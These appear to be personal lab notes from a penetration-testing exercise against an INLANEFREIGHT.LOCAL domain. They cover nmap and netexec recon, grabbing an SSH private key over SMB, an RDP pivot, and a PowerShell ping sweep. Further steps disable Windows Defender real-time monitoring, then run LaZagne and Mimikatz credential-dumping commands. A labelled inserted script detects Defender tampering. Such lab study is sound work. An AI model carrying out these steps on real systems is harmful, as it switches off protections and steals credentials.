# Recon
- ping test ![[images/Pasted image 20251024132946.png]]
- light nmap scan ![[images/Pasted image 20251024133122.png]]
- detailed nmap scan ![[images/Pasted image 20251024133544.png]]
## Netexec Enum
- `nxc smb` scan ![[images/Pasted image 20251024133656.png]]
- Add in `-d INLANEFREIGHT.LOCAL` ![[images/Pasted image 20251024133927.png]]
- `nxc rdp` scan ![[images/Pasted image 20251024133816.png]]
## SMB Enum
- Connect with `smbclient`
- prepend domain to username: `-U inlanefreight.local/vfrank` ![[images/Pasted image 20251024134408.png]]
- id_rsa for vfrank ![[images/Pasted image 20251024134445.png]]
- grab, move to loot folder, and rename
- Nothing in apendragon, Public, or Default
## RDP Enum
- RDP connect ![[images/Pasted image 20251024134956.png]]
- Able to open PowerShell as admin
- Light enum
- All the privs we need ![[images/Pasted image 20251024135152.png]]
- I see yet another subnet 172.16.10.0/24
- Run a PowerShell ping sweep script that is an `fping` analogue ![[images/Pasted image 20251024140912.png]]
- Found a new host (172.16.10.5) on subnet C
```powershell
# Print only the addresses that answer a single echo request
1..254 | ForEach-Object { $ip = "172.16.10.$_"; if (Test-Connection -ComputerName $ip -Count 1 -Quiet) { $ip } }
```
# Move files to PIVOTWIN10
- RDP drag and drop works ![[images/Pasted image 20251024141033.png]]
- Files keep getting deleted by Windows Defender
- Because we have admin privs, try to uninstall/disable Windows Defender
- Uninstall didn't work, but disable did ![[images/Pasted image 20251024140835.png]]
```powershell
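# Attempt 1: remove the Defender feature (did not work on this host)
Uninstall-WindowsFeature -Name Windows-Defender
# Attempt 2: turn off real-time monitoring (worked)
Set-MpPreference -DisableRealtimeMonitoring $true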
```
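
A defender-side check for the step above, added here as an example and not part of the original notes: it reports whether Defender real-time protection is currently on and pulls the Defender operational-log events recorded when real-time protection is switched off (5001) or the configuration changes (5007). The function name and the 24-hour lookback are assumptions.

```powershell
# Added example: detection/verification only, not from the original notes.
# Get-DefenderTamperEvidence is a hypothetical helper name.
function Get-DefenderTamperEvidence {
    param(
        [int]$LookbackHours = 24   # assumption: review the last 24 hours
    )

    # Current protection state as Defender itself reports it
    $status = Get-MpComputerStatus

    # 5001 = real-time protection disabled, 5007 = Defender configuration changed
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001, 5007
        StartTime = (Get-Date).AddHours(-$LookbackHours)
    }
    # Get-WinEvent raises an error when nothing matches, so suppress it
    # and normalise the result to an (possibly empty) array.
    $events = @(Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)

    [pscustomobject]@{
        ComputerName              = $env:COMPUTERNAME
        RealTimeProtectionEnabled = $status.RealTimeProtectionEnabled
        IsTamperProtected         = $status.IsTamperProtected
        SuspiciousEventCount      = $events.Count
        Events                    = $events | Select-Object TimeCreated, Id, Message
    }
}

$evidence = Get-DefenderTamperEvidence
$evidence | Format-List ComputerName, RealTimeProtectionEnabled, IsTamperProtected, SuspiciousEventCount
$evidence.Events | Format-Table -AutoSize -Wrap

# Flag the host when protection is off or was switched off inside the window
if (-not $evidence.RealTimeProtectionEnabled -or $evidence.SuspiciousEventCount -gt 0) {
    Write-Warning "Defender real-time protection is off or was changed in the lookback window."
}
```

With Tamper Protection enabled, `Set-MpPreference -DisableRealtimeMonitoring $true` is ignored even from an elevated session, so `IsTamperProtected = False` on a workstation is worth flagging on its own.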
# Lazagne
- Run `lazagne.exe` ![[images/Pasted image 20251024141207.png]]
- More of the same as lazagne output on PIVOT-SRV01
- No new users
- vfrank's privkey leaked, which we already have from SMB enum
# Mimikatz
- Run `mimikatz.exe`
- run `sekurlsa::credman`
- New username: vfrank
- run `sekurlsa::tickets /export`
- run `sekurlsa::logonPasswords`
- run `sekurlsa::minidump C:\path\lsass.dmp`
- More of the same as mimikatz output on PIVOT-SRV01
- No new users